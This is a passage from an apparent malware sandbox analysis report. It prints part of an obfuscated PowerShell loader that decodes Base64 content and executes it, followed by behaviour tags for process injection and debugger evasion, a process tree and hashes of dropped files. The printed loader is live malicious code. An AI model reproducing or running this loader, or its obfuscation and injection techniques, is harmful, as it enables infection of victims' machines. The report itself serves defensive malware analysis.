LudoSensbStimaStjalResh: QuaaPerifNul,f Hane PrekTopbt.odwas trtDisaiM llo ogindivu=U jo$Analg nudlE uiob rkb Te.aUnarl Epi:Gle BVersaKi,irudtobo,sce ediiGlunrWattoUfat+ fot+ Pas%My.e$Is cA Badd GnimdaguiBa an jvli ndc Sm uUdaal LazaSterrunreyIken.Dobbc TesoDiknu BorncitrtA,ns ') ;$Aflejringerne=$Adminiculary[$affektation];}$spirt=326747;$Skibshandlerens=29164;Fanklubbernes (Vigils202 'T pp$OpgagMaealSivsoStadb Seia.eptlM,ng: anOTapexTh ri Ldrd CitaEffesStateL,so8 Ac.9Over Wrai= Pop EnsiGBnnee,ialtNiss-MannCBrudoGathn dudt oweeSnicn I tt D,k isc $FerisFoppaUdelgBon.nFlotoDiacmTr.gsAppapGoveue tinRugadg stnPaa.e AbusLiby ');Fanklubbernes (Vigils202 'S.or$MitigInsplGardo esebU unaS,enl Bas:LgneACoqul It b olla umnBag sSkovkAdse phly= dir For[MargSWillyGladsAfl tSeedeUnacm.ach.B,siC ndmoBandnSt bvArmueBa,gr Pr,t Bis] ran:Brob: FolFDi trReteo perminddBYlahaTeonsMonteSubt6Em a4Rep.SAlemtGentrMiljiStoinDun gMaib( Sus$Cr.dO lasx SpriAn.idS peaVarisou reBegi8 Bro9,eno)Afp ');Fanklubbernes (Vigils202 'symp$RevugVarelFr toYerebVartaArgol Kap: eryMMousaB anlGroskSk vnTresiB nynCyligHatcePracrV cksUkl D,a= as Svas[su cSClinyId osNonetPraeestarmGam .NecrTRacheA tixDygttTu.b.FlukE O fnUndecTospoUensd liviUn un T,ngBill]Bli.:Reel:Spa ABrecSG leC undIHalvIEngr.BetoG paeP yltPseuSDalrt.rotrTfleiPsycnIndag Nab( Dan$ skrAsnorlRumpbIntea.ptrnPe,tsF,mek Est)Klo ');Fanklubbernes (Vigils202 'Nonb$EftegRoutl Ho,oAf eb Udga AfslFads:BhutA G.yrLserc enko vers at=Tilb$R omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"4⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2940
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a0fd179c44576bed10f175d5164ccc37
SHA19d88fe9d26315d57baab92380aaa76ee9f533b1f
SHA2564504c24563e2ff477ecffdaa737bcf86c7e9600ae42b39dea7f1c9f066e468af
SHA5123b4da93b761a9d1ff402d5d570eb0657824b04a17cc015d3174eb64f677396735c3e6b64ca6d701a721a6821acf25ddc8f4d96706aeab9fec14801384f1d1b91
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N08ABZJSHZJXSN7NONQE.temp
Filesize7KB
MD58feb3b0f32cde515768c421d7cedc9f2
SHA131f371b5767542ef65297181196f9bd95e394c1c
SHA25684e82a0e69492d33cedab1f98ae17684a05a963438d7e61e71f031f354c932ff
SHA512dda4251d1f09b18c38ef476f537f14cd1d1216fb6a9a7285de2e7fca2942d6d423ed41c431c226dce2787b193f8eb3b9c82d2564b462218c3406331512b6e205
-
Filesize
463KB
MD5e9bb4d5b8741d25cee213e93e940dcdb
SHA188ed84dcb96f4213925e3f82a1f6266b87d577d6
SHA256f27849467e5652ec2c195e913dd90e717f505b87100d2dd68a145f68e1c42fc9
SHA51231adfb96a8171b8cdf201da024eb380ddcf2d310f2e5d8f41588a4e73a66401c91986f4d8a3c39fe6b460f0f889337cfcbc7b54b15b609180fdcde7925602acb